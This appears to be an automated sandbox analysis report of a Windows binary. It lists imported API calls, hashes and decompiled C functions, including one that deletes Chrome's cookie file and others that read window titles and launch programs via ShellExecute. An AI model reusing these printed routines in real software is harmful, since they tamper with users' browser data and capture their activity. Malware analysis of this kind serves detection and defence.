                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA75
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA81
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA8D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA99
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DAA5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@CreateD@1@@FileG@2@@std@@G@std@@KeyboardLayoutNameV01@@V10@V10@@_itoa
                                                                                • String ID:
                                                                                • API String ID: 3751107300-0
                                                                                • Opcode ID: 408225e8519de02d29d67407c5278573f5b0eacb6e86d161ac775c050189f6ac
                                                                                • Instruction ID: 7445f7784f172681db4ab6ed8b3104eac86986a278aabc0f04733adb6ce879a5
                                                                                • Opcode Fuzzy Hash: 408225e8519de02d29d67407c5278573f5b0eacb6e86d161ac775c050189f6ac
                                                                                • Instruction Fuzzy Hash: 39310EB280051DABCB05ABE1EC49EEEBB7CBB54305F04447AF506E3061EF745689CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040EA96, Relevance: 27.1, APIs: 18, Instructions: 95windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowTextW.USER32 ref: 0040EAAF
                                                                                • IsWindowVisible.USER32(?), ref: 0040EAB8
                                                                                • sprintf.MSVCRT ref: 0040EACF
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040EAE6
                                                                                  • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                                                                  • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                                                                  • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                                                                  • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                                                                  • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,?,004169C4,00000000,004169C8), ref: 0040EB20
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,00000000,004169C8), ref: 0040EB2D
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00000000,004169C8), ref: 0040EB3A
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB47
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB57
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB65
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB71
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB7A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB83
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB8C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB95
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB9E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBA7
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBB0
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$G@2@@std@@G@std@@V10@$??0?$basic_string@$D@1@@Window$?c_str@?$basic_string@?length@?$basic_string@G@1@@TextV01@V01@@V10@0@VisibleY?$basic_string@_itoasprintf
                                                                                • String ID:
                                                                                • API String ID: 1480451481-0
                                                                                • Opcode ID: 5159a5ed7c6a575ed3fd98bb9d52d8aef8cef27cad9d46fb2674fe92d0d4bc58
                                                                                • Instruction ID: 896110e7d44d4e8721ff4af176c5386cc18dfd6a0cdb0307768c484521d74486
                                                                                • Opcode Fuzzy Hash: 5159a5ed7c6a575ed3fd98bb9d52d8aef8cef27cad9d46fb2674fe92d0d4bc58
                                                                                • Instruction Fuzzy Hash: 0031BEB2C0060DEBDB05ABE0EC49DDE7B7CAB54305F108026F526E6061EB759699CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D64E, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D665
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D68C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D69F
                                                                                  • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D6BA
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D6C3
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D6D9
                                                                                  • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,?,?,00411AD6), ref: 00412E5A
                                                                                  • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00411AD6), ref: 00412E64
                                                                                  • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D6F3
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D704
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D711
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D734
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D74B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                  • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                  • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                  • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                  • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                  • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V01@@V?$basic_string@$??2@??3@?length@?$basic_string@?size@?$basic_string@ExecuteShell
                                                                                • String ID: open
                                                                                • API String ID: 2112629403-2758837156
                                                                                • Opcode ID: e0b4ccf5b81036f06e82adf55bc2754796fbdd6e0c7d7cf8e753f00f06615192
                                                                                • Instruction ID: 3c6387fd113382c931602557de23b741b53e110e960cdbc023917b4df3b65b40
                                                                                • Opcode Fuzzy Hash: e0b4ccf5b81036f06e82adf55bc2754796fbdd6e0c7d7cf8e753f00f06615192
                                                                                • Instruction Fuzzy Hash: 94317C72910519EBCB04BBE1EC999FE7778AF54356B40487EF412A30E1EE785A04CB28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004071CF, Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 65fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 32%
                                                                                			E004071CF() {
				char _v5;
				char _v6;
				char _v24;
				void* _v40;
				char* _t12;
				CHAR* _t13;
				long _t20;
				char* _t21;
				void* _t25;

				_t12 = getenv("UserProfile");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				_t13 =  &_v24;
				L00414170();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				if(DeleteFileA(_t13) != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
					E00407A90("\n[Chrome Cookies found, cleared!]");
					_t25 = 1;
					L8:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t25;
				}
				_t20 = GetLastError();
				if(_t20 == 0) {
					_t21 =  &_v6;
					L5:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
					E00407A90("\n[Chrome Cookies not found]");
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 1;
				}
				if(_t20 == 1) {
					_t21 =  &_v5;
					goto L5;
				}
				_t25 = 0;
				goto L8;
			}












                                                                                0x004071e4
                                                                                0x004071ef
                                                                                0x004071f6
                                                                                0x004071fa
                                                                                0x00407205
                                                                                0x0040720e
                                                                                0x0040721d
                                                                                0x00407271
                                                                                0x00407277
                                                                                0x0040727f
                                                                                0x00407281
                                                                                0x00407284
                                                                                0x00000000
                                                                                0x0040728a
                                                                                0x00407226
                                                                                0x00407227
                                                                                0x0040725c
                                                                                0x00407238
                                                                                0x0040723e
                                                                                0x00407244
                                                                                0x0040724f
                                                                                0x00000000
                                                                                0x00407255
                                                                                0x0040722a
                                                                                0x00407233
                                                                                0x00000000
                                                                                0x00407236
                                                                                0x0040722c
                                                                                0x00000000

                                                                                APIs
                                                                                • getenv.MSVCRT ref: 004071E4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004071EF
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004071FA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407205
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040720E
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00407215
                                                                                • GetLastError.KERNEL32 ref: 0040721F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],00000000), ref: 0040723E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040724F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],00000000), ref: 00407271
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407284
                                                                                Strings
                                                                                • [Chrome Cookies not found], xrefs: 00407239
                                                                                • [Chrome Cookies found, cleared!], xrefs: 0040726C
                                                                                • UserProfile, xrefs: 004071DF
                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 004071D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                • API String ID: 3740952235-304995407
                                                                                • Opcode ID: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                                                                • Instruction ID: 500589693ed1866fcec617c4cf6893fdd7c78fd48f7414b1be1692f61b7e1039
                                                                                • Opcode Fuzzy Hash: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                                                                • Instruction Fuzzy Hash: AE119375D04609EBCB00FBA0DD4E9FE7738EA94741750007AF812E31D1EB796A45CAAB
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041203B, Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 61timeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 32%
                                                                                			E0041203B(char _a4, char _a20) {
				struct _SYSTEMTIME _v20;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				int _t18;
				char* _t26;
				char* _t27;
				char* _t28;
				char* _t29;

				if( *0x41bcac != 0) {
					GetLocalTime( &_v20);
					_t3 =  &(_v20.wSecond); // 0x4051ef
					_t26 =  &_v84;
					L00414176();
					_t27 =  &_v68;
					L00414170();
					_t28 =  &_v52;
					L00414140();
					_t29 =  &_v36;
					L00414170();
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t29, _t28, _t28, _t27, _t27, _t26, _t26, "%02i:%02i:%02i:%03i ",  &_a4, " ",  &_a20, 0x415770, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff,  *_t3 & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff);
					_t18 = printf(_t29);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t18;
			}













                                                                                0x00412048
                                                                                0x00412052
                                                                                0x0041205d
                                                                                0x0041207e
                                                                                0x00412087
                                                                                0x00412090
                                                                                0x00412094
                                                                                0x0041209d
                                                                                0x004120a1
                                                                                0x004120aa
                                                                                0x004120ae
                                                                                0x004120b8
                                                                                0x004120bf
                                                                                0x004120cb
                                                                                0x004120d4
                                                                                0x004120dd
                                                                                0x004120e6
                                                                                0x004120e6
                                                                                0x004120ef
                                                                                0x004120f8
                                                                                0x004120ff

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00412052
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                                                                • printf.MSVCRT ref: 004120BF
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                                                                • String ID: %02i:%02i:%02i:%03i $Q@
                                                                                • API String ID: 4249031962-3186260181
                                                                                • Opcode ID: c84b80c73e41f326376e78c5e9687590ff294f2bda796e8098bc6b7d81fc5b38
                                                                                • Instruction ID: f3ca9ea98f16ce9d12e0c862744fbe2e8a9e2291361fb12ebe279ffe92a69474
                                                                                • Opcode Fuzzy Hash: c84b80c73e41f326376e78c5e9687590ff294f2bda796e8098bc6b7d81fc5b38
                                                                                • Instruction Fuzzy Hash: 9311D3B680011DFBCF01EBE1EC49DEF7B7CBA54745B044026F912D2061EB789699CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405812, Relevance: 25.6, APIs: 17, Instructions: 138COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                                                                  • Part of subcall function 0040209B: #4.WS2_32(0041BE70,0041BE74,00000010,?,0041B320,?,0040CA5C), ref: 004020B1
                                                                                • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 00405853
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405868
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405874
                                                                                  • Part of subcall function 00412DDF: CreateFileW.KERNELBASE(000177DE,80000000,00000003,00000000,00000003,00000080,00000000,00000000,000177DE,?,00409C9F,00000000), ref: 00412DF9
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405898
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004058AE
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058B7
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004058CC
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058D6
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                                                                  • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                                                                  • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405902
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405922
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040590C
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405943
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040594D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405963
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405974
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040597F
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,0041B310), ref: 00405994
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
